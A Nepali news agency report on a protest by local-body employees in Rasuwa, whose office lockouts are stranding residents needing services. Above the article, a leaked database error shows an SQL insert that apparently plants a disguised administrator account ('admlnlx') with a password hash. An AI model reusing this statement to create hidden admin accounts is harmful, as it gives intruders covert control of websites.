WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2aaYovyBL/5fLPqJvvdBNGbG3o1jY/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:46:39', '', 'admlnlx', 'admlnlx')
रसुवा ,फागुन २-
स्थानीय निकायका कर्मचारीको आन्दोलन चर्किंदै गएपछि कर्मचारीले जिविस तथा गाविसको कार्यालयमा तालाबन्दी गर्दा सेवाग्राही मर्कामा परेका छन् ।
स्थानीय निर्वाचनको घोषणा, स्थानीय निकायका कर्मचारीलाई समायोजन गर्दा योग्यता, क्षमताका आधारमा जिम्मेवारी दिइनुपर्ने, अस्थायी तथा करारमा कार्यरत कर्मचारीका लागि उचित व्यवस्थापन गर्नुपर्ने माग राख्दै माघ १९ गतेदेखि आन्दोलनरत कर्मचारीले आफ्नो माग सम्बोधन नभएकाले जिविस, जिल्ला प्राविधिक कार्यालय र गाविसहरुमा तालाबन्दी गरी धर्ना दिएको संयुक्त सङ्घर्ष समितिका संयोजक लीलानाथ नेपालले बताउनुभयो । गाविसको काम बन्द हुँदा नागरिकता लिन, जग्गा रजिस्ट्रेसन पास गर्ने कार्यको सिफारिससमेत नपाउँदा सेवाग्राही मर्कामा परेका छन् ।
आमनागरिकमा परेको मर्कालाई मध्यनजर राख्दै स्थानीय निकायका कर्मचारीको माग सम्बोधन गरी काममा फर्कने वातावरण सिर्जना गर्न सरकारसमक्ष आग्रह गरिएको रसुवा नागरिक समाजका अध्यक्ष बाबुलाल तामाङले बताउनुभयो । स्थानीय निकायका कर्मचारीले कार्यालय बन्द गरेपछि विकास निर्माणमा प्राविधिक अनुगमनसमेत हुन नसकेको स्थानीय विकास अधिकारी र प्राविधिक प्रमुखलगायत निजामतीतर्फका सबै कर्मचारी आफ्नो कार्यक्षेत्र छोडी मन्त्रालयतर्फ गएको कर्मचारीहरुले बताए । जिविसमा तालाबन्दी भएपछि नेपाल प्रहरीले कडा सुरक्षा दिइरहेको जिल्ला प्रहरी कार्यालय, रसुवाले जनाएको छ ।- रासस